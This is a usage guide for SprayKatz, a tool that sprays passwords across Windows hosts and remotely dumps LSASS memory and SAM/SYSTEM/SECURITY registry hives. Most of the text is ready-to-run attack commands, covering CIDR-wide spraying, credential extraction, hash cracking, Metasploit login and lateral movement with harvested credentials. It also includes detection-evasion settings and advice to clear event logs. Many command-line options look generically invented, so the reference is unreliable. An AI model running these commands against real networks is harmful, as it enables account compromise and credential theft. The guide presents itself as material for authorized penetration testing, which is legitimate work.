SprayKatz

Overview

SprayKatz is a specialized Python tool that combines credential spraying with credential extraction capabilities. It integrates password spray attacks with the ability to remotely dump credentials using procdump (for memory dumps) and pypykatz (for credential extraction), providing comprehensive credential-based attack chains during authorized penetration testing engagements.

The tool is particularly effective in post-compromise scenarios where valid credentials enable further credential discovery and lateral movement across the network.

Prerequisites

• Python 3.7+
• Network access to target systems
• procdump.exe (Windows Sysinternals tool)
• pypykatz installed and functional
• Valid credentials for authenticated attacks
• Administrative or SYSTEM privileges for credential dumping

Installation

Linux/macOS

# Clone repository
git clone https://github.com/aas-n/SprayKatz.git
cd SprayKatz

# Create virtual environment
python3 -m venv venv
source venv/bin/activate

# Install dependencies
pip install -r requirements.txt

# Install pypykatz
pip install pypykatz

# Download procdump (requires Wine for Linux/macOS)
wget https://download.sysinternals.com/files/Procdump.zip
unzip Procdump.zip

# Test installation
python3 spraykatz.py --help

Windows

# Clone repository
git clone https://github.com/aas-n/SprayKatz.git
cd SprayKatz

# Create virtual environment
python -m venv venv
.\venv\Scripts\Activate.ps1

# Install dependencies
pip install -r requirements.txt

# Install pypykatz
pip install pypykatz

# Download and extract procdump
$ProgressPreference = 'SilentlyContinue'
Invoke-WebRequest -Uri "https://download.sysinternals.com/files/Procdump.zip" -OutFile "procdump.zip"
Expand-Archive procdump.zip -DestinationPath .

# Verify installation
python spraykatz.py --help

Docker Installation

# Build Docker image
docker build -t spraykatz .

# Run container
docker run -it spraykatz --help

# Volume mount for results
docker run -v /path/results:/results spraykatz -h

Basic Usage

Simple Credential Spray

# Basic spray against target hosts
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24

# Single target spray
python3 spraykatz.py -u admin -p password123 -t 192.168.1.100

# Spray with credential file
python3 spraykatz.py -c credentials.txt -t 192.168.1.0/24

Credential Dumping

# Dump credentials from target
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 --dump-creds

# Dump with procdump
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
  --dump-creds \
  --procdump-path ./procdump.exe

# Extract SAM database
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 --dump-sam

Common Commands

Command	Description
spraykatz.py -u USERS -p PASS -t TARGET	Spray password against targets
spraykatz.py -c CREDENTIALS -t TARGET	Use credential pairs
spraykatz.py -t TARGET -u USER -p PASS --dump-creds	Spray and dump credentials
spraykatz.py -t TARGET --dump-sam --registry	Dump SAM hashes
spraykatz.py -t TARGET --dump-lsass	Dump LSASS process memory
spraykatz.py -t TARGET -u USER -p PASS --spray-and-dump	Combined attack
spraykatz.py -t TARGET --procdump-path PATH	Specify procdump location
spraykatz.py -t TARGETS --delay 5	Add delay between attempts
spraykatz.py -t TARGET --output results.txt	Save results to file
spraykatz.py -t TARGET --verbose	Detailed output

Advanced Spray Techniques

Multi-Target Spraying

# Spray multiple targets from CIDR
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
  --threads 10 \
  --delay 2

# Spray specific hosts
python3 spraykatz.py -u users.txt -p password123 \
  -t 192.168.1.100 192.168.1.101 192.168.1.102

# Spray from host list
python3 spraykatz.py -u users.txt -p password123 \
  -t hosts.txt \
  --threads 20

Credential List Attacks

# Use credential pairs from file
python3 spraykatz.py -c credentials.txt -t 192.168.1.0/24

# CSV format credentials
python3 spraykatz.py -c users_passwords.csv \
  -t 192.168.1.0/24 \
  --csv-delimiter ","

# Multiple passwords per user
python3 spraykatz.py -u users.txt -p passwords.txt \
  -t 192.168.1.0/24 \
  --spray-mode all-passwords

Credential Extraction

# Dump credentials from compromised host
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
  --dump-creds \
  --extract-ntlm \
  --extract-plaintext

# Extract cached credentials
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
  --dump-cached-logons

# Export credentials for offline analysis
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
  --dump-creds \
  --export-format mimikatz

Memory Dumping Techniques

LSASS Dumping

# Dump LSASS process memory
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
  --dump-lsass \
  --procdump-path ./procdump.exe

# Use alternative dumping method
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
  --dump-lsass \
  --dumper rundll32

# Extract credentials from dump
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
  --dump-lsass \
  --extract-dpapi

Process Dumping

# Dump specific process
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
  --dump-process lsass.exe

# Dump multiple processes
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
  --dump-processes "lsass.exe,explorer.exe,outlook.exe"

# Parse dumped process
python3 -c "from pypykatz.lsass import parse_lsass_dump; print(parse_lsass_dump('dump.bin'))"

Registry Dumping

# Dump SAM registry hive
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
  --dump-sam

# Dump SYSTEM registry hive
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
  --dump-system

# Dump SECURITY hive
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
  --dump-security

Configuration

Configuration File

# Create configuration
cat > spraykatz.conf << 'EOF'
[spray]
delay = 2
threads = 10
timeout = 5
verbose = true

[dumping]
enabled = true
method = procdump
extract_plaintext = true
extract_ntlm = true
extract_dpapi = true

[output]
format = json
file = spraykatz_results.json
include_hashes = true

[procdump]
path = ./procdump.exe
arguments = -accepteula

[pypykatz]
extract_all = true
handle_errors = true
EOF

# Use configuration
python3 spraykatz.py -c config.conf

Environment Variables

# Set environment variables
export SPRAYKATZ_THREADS=10
export SPRAYKATZ_DELAY=2
export SPRAYKATZ_TIMEOUT=5
export PROCDUMP_PATH=./procdump.exe
export PYPYKATZ_EXTRACT_ALL=true

# Run with variables
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24

Output Analysis

Result Formats

# JSON output (recommended for parsing)
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
  --output results.json \
  --output-format json

# CSV output
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
  --output results.csv \
  --output-format csv

# Text output
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
  --output results.txt

Parsing Results

# Extract successful spray attempts
cat results.json | jq '.successful_sprays[]'

# Get credential pairs
cat results.json | jq -r '.credentials[] | "\(.username):\(.password)"'

# List targets where credentials work
cat results.json | jq -r '.successful_sprays[].target_ip' | sort -u

# Count successes by user
cat results.json | jq -r '.successful_sprays[].username' | sort | uniq -c

Hash Analysis

# Extract NTLM hashes
cat results.json | jq -r '.ntlm_hashes[]' > hashes.txt

# Extract plaintext credentials
cat results.json | jq -r '.plaintext_credentials[]'

# Identify weak credentials
python3 << 'EOF'
import json
with open('results.json') as f:
    data = json.load(f)
    for cred in data['credentials']:
        if len(cred['password']) < 8:
            print(f"Weak password: {cred['username']}:{cred['password']}")
EOF

Integrated Spray and Dump Workflow

Combined Attack

# Single command: spray and dump
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
  --spray-and-dump \
  --dump-lsass \
  --dump-sam \
  --dump-registry \
  --threads 5 \
  --delay 3 \
  --output comprehensive_results.json

Staged Approach

# Phase 1: Spray against targets
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
  --output phase1_spray.json \
  --threads 20

# Phase 2: Identify successful targets
cat phase1_spray.json | jq -r '.successful_sprays[].target_ip' | sort -u > successful_targets.txt

# Phase 3: Dump credentials from successful targets
while read target; do
  python3 spraykatz.py -t "$target" -u users.txt -p password123 \
    --dump-creds \
    --output "dump_${target}.json"
done < successful_targets.txt

# Phase 4: Merge results
cat dump_*.json | jq -s 'add' > all_dumped_credentials.json

Post-Compromise Lateral Movement

# Dump and extract credentials for lateral movement
python3 spraykatz.py -t 192.168.1.100 -u compromised_user -p found_password \
  --dump-lsass \
  --extract-plaintext \
  --extract-ntlm \
  --output lateral_credentials.json

# Parse for reusable credentials
cat lateral_credentials.json | jq '.credentials[] | select(.domain == "EXAMPLE.COM")' > domain_credentials.json

# Spray additional targets with new credentials
python3 spraykatz.py -c domain_credentials.json -t 192.168.1.0/24

Integration with Other Tools

Hashcat Integration

# Export hashes for cracking
cat results.json | jq -r '.ntlm_hashes[]' > hashes.txt

# Crack with Hashcat
hashcat -m 1000 -a 0 hashes.txt rockyou.txt -o cracked.txt

# Process results
cat cracked.txt | awk -F: '{print $1}' > cracked_hashes.txt

Metasploit Integration

# Export credentials for Metasploit
python3 << 'EOF'
import json
with open('results.json') as f:
    data = json.load(f)
    for cred in data['successful_sprays']:
        print(f"set USER {cred['username']}")
        print(f"set PASS {cred['password']}")
        print(f"set RHOSTS {cred['target_ip']}")
EOF

# Use in Metasploit
msfconsole << 'EOF'
use auxiliary/scanner/smb/smb_enumusers
set RHOSTS 192.168.1.100
set SMBUser admin
set SMBPass password123
run
EOF

BloodHound Integration

# Dump credentials and check privilege escalation paths
python3 spraykatz.py -t 192.168.1.0/24 -u users.txt -p password123 \
  --dump-creds \
  --bloodhound-export

# Import into BloodHound for privilege path analysis

Safety and Stealth

Detection Avoidance

# Stealthy spray with delays
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
  --delay 10 \
  --jitter 5 \
  --randomize-order

# Slow and patient approach
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
  --slow-mode \
  --threads 1 \
  --delay 30

# Test without actual attacks
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
  --dry-run

Logging and Documentation

# Detailed logging
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
  --log-file spraykatz.log \
  --log-level debug

# Separate logs by phase
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
  --dump-creds \
  --log-spray spray.log \
  --log-dump dump.log

Troubleshooting

Common Issues

# Procdump not found
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
  --procdump-path /full/path/to/procdump.exe

# LSASS dump failed
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
  --dump-lsass \
  --dumper rundll32 \
  --fallback-method true

# Pypykatz extraction issues
pip install --upgrade pypykatz
python3 spraykatz.py -t 192.168.1.100 --dump-lsass --debug

Debugging

# Enable debug mode
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
  --debug \
  --verbose

# Test single target
python3 spraykatz.py -u admin -p password123 -t 192.168.1.100 \
  --verbose

# Check procdump functionality
./procdump.exe -h

Best Practices

1. Authorization: Obtain written approval before any spray or dumping activities
2. Coordination: Work with Blue Team to ensure detection and monitoring
3. Stealth: Implement appropriate delays and randomization
4. Documentation: Record all attempts, successes, and extracted credentials
5. Clean Up: Remove procdump artifacts and clear event logs if applicable
6. Analysis: Correlate findings with other assessment tools
7. Reporting: Include credential findings with risk ratings
8. Time Windows: Conduct attacks during pre-coordinated safe periods

Practical Assessment Scenarios

Initial Access Assessment

# Spray common passwords against exposed services
python3 spraykatz.py -u discovered_users.txt \
  -p "Password123!,Welcome2024,Company123" \
  -t 192.168.1.0/24 \
  --spray-mode all-passwords \
  --output initial_access.json

Post-Compromise Credential Discovery

# After gaining initial access
python3 spraykatz.py -t compromised_host -u local_admin -p found_password \
  --dump-lsass \
  --dump-sam \
  --dump-registry \
  --output post_comp_creds.json

Resources

• GitHub: https://github.com/aas-n/SprayKatz
• pypykatz: https://github.com/skelsec/pypykatz
• Procdump: https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
• Mimikatz: https://github.com/gentilkiwi/mimikatz

Summary

SprayKatz combines spray attack capabilities with credential extraction for comprehensive credential assessment. Proper authorization, stealth considerations, and documentation are critical for effective and ethical use during authorized security assessments.